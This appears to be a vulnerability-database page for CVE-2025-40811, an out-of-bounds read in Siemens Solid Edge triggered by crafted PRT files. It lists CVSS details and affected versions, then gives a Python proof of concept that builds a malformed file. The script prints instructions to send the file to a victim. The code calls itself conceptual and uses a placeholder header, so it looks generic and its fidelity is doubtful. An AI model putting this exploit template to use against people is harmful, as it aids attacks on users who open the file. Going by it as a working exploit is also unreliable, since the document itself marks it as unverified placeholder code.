Security Vulnerability Report
CVE-2025-40811 CVSS 7.8 HIGH

CVE-2025-40811

Published: 2025-10-14 10:15:40
Last Modified: 2025-10-16 13:52:25

Description

A vulnerability has been identified in Solid Edge SE2024 (All versions < V224.0 Update 14), Solid Edge SE2025 (All versions < V225.0 Update 6). The affected applications contain an out-of-bounds read vulnerability while parsing specially crafted PRT files. This could allow an attacker to crash the application or execute code in the context of the current process.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:siemens:solid_edge_se2024:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_0001:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00010:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:siemens:solid_edge_se2024:224.0:update_00011:*:*:*:*:*:* - VULNERABLE
Solid Edge SE2024 < V224.0 Update 14
Solid Edge SE2025 < V225.0 Update 6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40811 - Siemens Solid Edge PRT File Out-of-Bounds Read PoC
# This is a conceptual PoC demonstrating the vulnerability trigger mechanism
# WARNING: For educational and security research purposes only
import struct
import sys


def create_malicious_prt(filename):
    """
    Create a malformed PRT file to trigger out-of-bounds read vulnerability
    in Siemens Solid Edge when parsing specially crafted PRT files.
    """
    # PRT file header - valid Solid Edge part file signature
    header = b'\x00' * 16  # File header placeholder

    # Malicious data section with corrupted length fields
    # The OOB read is triggered when parser reads beyond allocated buffer
    # based on an inflated length value in the file structure
    malformed_data = struct.pack('<I', 0xFFFFFFFF)  # Inflated size field causing OOB read
    malformed_data += b'\x41' * 4096  # Payload data

    # Additional corrupted structure pointers
    corrupted_offsets = struct.pack('<Q', 0xDEADBEEFCAFEBABE)  # Invalid offset
    corrupted_offsets += struct.pack('<Q', 0x4141414141414141)  # Another invalid offset

    # Combine all sections
    malicious_content = header + malformed_data + corrupted_offsets

    with open(filename, 'wb') as f:
        f.write(malicious_content)

    print(f"[+] Malicious PRT file created: {filename}")
    print(f"[!] Send this file to a victim using Solid Edge SE2024/SE2025")
    print(f"[!] When the victim opens the file, OOB read will be triggered")


if __name__ == "__main__":
    output_file = sys.argv[1] if len(sys.argv) > 1 else "exploit.prt"
    create_malicious_prt(output_file)
